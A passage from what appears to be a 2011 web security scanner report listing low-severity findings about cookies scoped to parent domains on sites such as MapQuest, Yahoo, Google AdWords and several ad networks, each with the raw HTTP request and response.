Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...

16.14. http://www.mapquest.com/icons/stop.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

.PNG
.
...IHDR.............e/O]...bIDATx....K.Q..p!.......B..H...x.LM!..m....L.i*....y...-.."...@0....YI.."J...5...wv6...[.m.e...9.....9...8....WN`Na$<t..[..0)f..5C..Y......L.TH.$.^[....
..M.{).%...
...[SNIP]...

16.15. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:46 GMT; path=/; domain=c3metrics.com
480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-00-59-46_1535373811304557186; expires=Tue, 03-May-2016 00:59:46 GMT; path=/; domain=c3metrics.com
480-nUID=adver_1535373811304557186; expires=Thu, 05-May-2011 01:14:46 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:46 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-00-59-46_1535373811304557186; expires=Tue, 03-May-2016 00:59:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1535373811304557186; expires=Thu, 05-May-2011 01:14:46 GMT; path=/; domain=c3metrics.com
Content-Length: 6658
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

16.16. http://abcnews.go.com/Entertainment/popup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://abcnews.go.com
Path:	/Entertainment/popup

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SWID=363BC427-C28A-43A8-8CBD-F5FAEA1DCED9; path=/; expires=Thu, 05-May-2031 10:52:20 GMT; domain=.go.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Entertainment/popup HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:52:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=363BC427-C28A-43A8-8CBD-F5FAEA1DCED9; path=/; expires=Thu, 05-May-2031 10:52:20 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...

16.17. http://add.my.yahoo.com/content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/content

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=0l8dhl16s50at&b=3&s=ab; expires=Tue, 05-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:52:13 GMT
Set-Cookie: B=0l8dhl16s50at&b=3&s=ab; expires=Tue, 05-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

16.18. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BCBAAsJvCAAuILBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1278496Y12520110421185410&time=4|0:56|-5&redir=http://at.atwola.com/adlink/5113/1955435/0/170/AdId=1646412;BnId=1;itime=557013265;kvugc=0;kvpg=music%2Eaol%2Fradioguide%2Fbb;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93312491;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=$CTURL$&r=0.9791483252774924 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CDJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAe; PRgo=BCBAAsJvCAAuILBBF-19!B; PRimp=79A20400-E860-6779-0309-A36001190200; PRca=|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2336
Set-Cookie:PRgo=BCBAAsJvCAAuILBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7CA20400-78D9-5794-1209-AE6000670200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

16.19. https://adwords.google.com/select/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

S=awfe=QLzNP4kC0XKUDMg0kcTrMQ:awfe-efe=QLzNP4kC0XKUDMg0kcTrMQ; Domain=.google.com; Path=/; Secure; HttpOnly
S_awfe=lOtVuDk4DP1zSjJkYgg-7w; Domain=.google.com; Path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=d9rkvy8BAAA.9QCH_JbBItRG1yn60m2UCA.rPxzLsIE8lczIY0qoOwsUA; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=QLzNP4kC0XKUDMg0kcTrMQ:awfe-efe=QLzNP4kC0XKUDMg0kcTrMQ; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=lOtVuDk4DP1zSjJkYgg-7w; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Thu, 05 May 2011 10:52:17 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

16.20. http://adx.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=558358678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhgj[2<?0P(*AuB-u**g1:XIEGDEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl9RF$+OaI:l_Qcc9wmRBbW$qm9'55djeSa8ZQ96*Jp)C^/<CN-yHf5FURTYHOv]@%<7Aq6u^k]-O]7X=2zKSL4quR8kO_D>X[HvK1.Z8LyTgPDtFmwP=9UjfKherrC(!HN)-rs$$.Z4RwKgg$hjvE=h]Y3^aGI31FC_+(AsbutS4%o=cG=F6ppp35v0Hp53EQnWXio#:w1_scIl_O(gee'(4OTfW/q:Rz1+w6b.Vi<p.T*C2GR6e]tqP0@3dSr9ox*G.!htZ]Mz+FTi@UGkKz@XApYJmq$=Vw>B=cnuV1(XHu?f9kld6tUGu]mWIwdMo@:9[ns]Nq8sV$[>K:4>wF](16qdoZ$6'I1F:`tO4!]q; path=/; expires=Wed, 03-Aug-2011 01:41:34 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Thu, 05 May 2011 01:41:34 GMT

GIF89a.............!.......,........@..L..;

16.21. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/ck/10105-123060-1629-2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo2=10105:1629/17912:1281/16228:26209; expires=Sun, 5-May-2013 5:19:24 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/ck/10105-123060-1629-2 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mojo2=17912:1281/16228:26209; mojo3=13198:5934/14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; svid=822523287793;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo2=10105:1629/17912:1281/16228:26209; expires=Sun, 5-May-2013 5:19:24 GMT; path=/; domain=.mediaplex.com;
Location: http://www.proflowers.com/portalsh?ref=fgvprtlsaol_hp050411_Unknown_DODControl_MdayspecchocMdelightUltmdg&Keyword=PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg_html&Network=AOL_com
Content-Length: 0
Date: Thu, 05 May 2011 10:52:16 GMT

16.22. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10105-123060-1629-2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:02:57 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/10105-123060-1629-2?mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:2060/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:02:57 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-2%3Fmpt%3D556984348&mpt=556984348&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1484701;BnId=1;itime=556984348;kvugc=0;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=
Content-Length: 0
Date: Thu, 05 May 2011 00:56:26 GMT

16.23. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/10105-123060-1629-6

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sun, 5-May-2013 5:07:38 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/10105-123060-1629-6?mpt=596776865&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596776865;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
